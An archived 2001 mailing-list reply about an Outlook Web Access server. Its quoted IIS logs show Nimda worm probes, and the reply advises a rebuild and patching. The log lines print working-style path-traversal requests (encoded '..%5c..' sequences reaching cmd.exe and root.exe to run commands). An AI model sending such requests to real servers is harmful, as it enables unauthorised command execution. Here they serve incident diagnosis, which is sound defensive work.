Re: Help with OWA hack?

From: ___cliff rayman___ (cliff@genwax.com)
Date: 10/06/01 

Message-ID: <3BBE3A22.CEC0BD66@spamless.genwax.com>
Date: Fri, 05 Oct 2001 15:54:26 -0700
From: ___cliff rayman___ <cliff@genwax.com>
To: "Mark Palmer, CCNA" <palmerm@concordia.edu>
Subject: Re: Help with OWA hack?

this is nimda. it has been running at full speed for
about 2 weeks now. i do not run windows on the
internet, but i believe you might have a problem with
this machine now based on the 500 internal server
errors in this log.

if this machine has been compromised, you will
probably need to wipe it clean and reinstall the
software from known good media. then, go to
the microsoft website and download all the needed
patches. somebody more familiar with the microsoft
site can give you the exact location.

continue to monitor this e-mail conference along with
bugtraqNT so that you keep up to date on all vulnerabilities
associated with windows.

start your search for information here:

"Mark Palmer, CCNA" wrote:

> I am realitively new to all this 2000 stuff. I have found some weird stuff
> in the syslog of a OWA machine on our network:
>
> 2001-10-03 14:58:11 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/root.exe /c+dir 404 3396 72 62 HTTP/1.0 www - - -
> 2001-10-03 14:58:13 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /MSADC/root.exe /c+dir 403 3439 70 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:15 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 3396 80 16 HTTP/1.0 www - - -
> 2001-10-03 14:58:17 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 3396 80 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:28 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:29 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117
> 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:31 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117
> 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:36 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
> /c+dir 403 3439 145 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:38 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 0 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:48 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:50 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:51 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:55 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 98 0 HTTP/1.0 www - - -
> 2001-10-03 14:58:56 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
> 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 100 0 HTTP/1.0 www - -
> -
> 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET
> /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - -
>
> What is this? I imagine its some kind of hack. How do I prevent this. I
> cannot use the lockdown tool as this is a machine running Outlook Web
> Access.
>
> Thank for the help.
>
> Regards,
> Mark Palmer 

--
___cliff rayman___cliff@genwax.com___http://www.genwax.com/

Relevant Pages

  • Re: winXP home edition or professional edition?
    ... the microsoft website doesn't ... only what windows needs to funtion. ... For most home users, these features ... Also note that Professional allows ten concurrent network ...
    (microsoft.public.windowsxp.general)
  • Re: OT: IEv7 screenshot
    ... The microsoft website says 'upcoming release' and being a IE user I will probably take the chance and install the public beta when it becomes available. ... If Microsoft are willing to offer IE7 for computers running older versions of Windows, ...
    (uk.media.tv.misc)
  • Re: Windows Xp pro keeps restarting and serious error messages
    ... MVP - Windows Shell/User ... > for a short time but it is now restarting randomly again. ... > I now seem to be getting serious error messages even when the computer ... > update from the microsoft website that was supposed to cure a problem ...
    (microsoft.public.windowsxp.general)
  • For people who are having activation problem or thinking they have a pirated version
    ... This was from a Microsoft website, but I modified for home and pro ... Change at least one digit of this value to deactivate Windows. ... Type the same product key you use to install windows xp in the New key ...
    (microsoft.public.windowsxp.general)
  • Re: For people who are having activation problem or thinking they have a pirated version
    ... This was from a Microsoft website, but I modified for home and pro ... Change at least one digit of this value to deactivate Windows. ... Type the same product key you use to install windows xp in the New key ...
    (microsoft.public.windowsxp.newusers)
Quantcast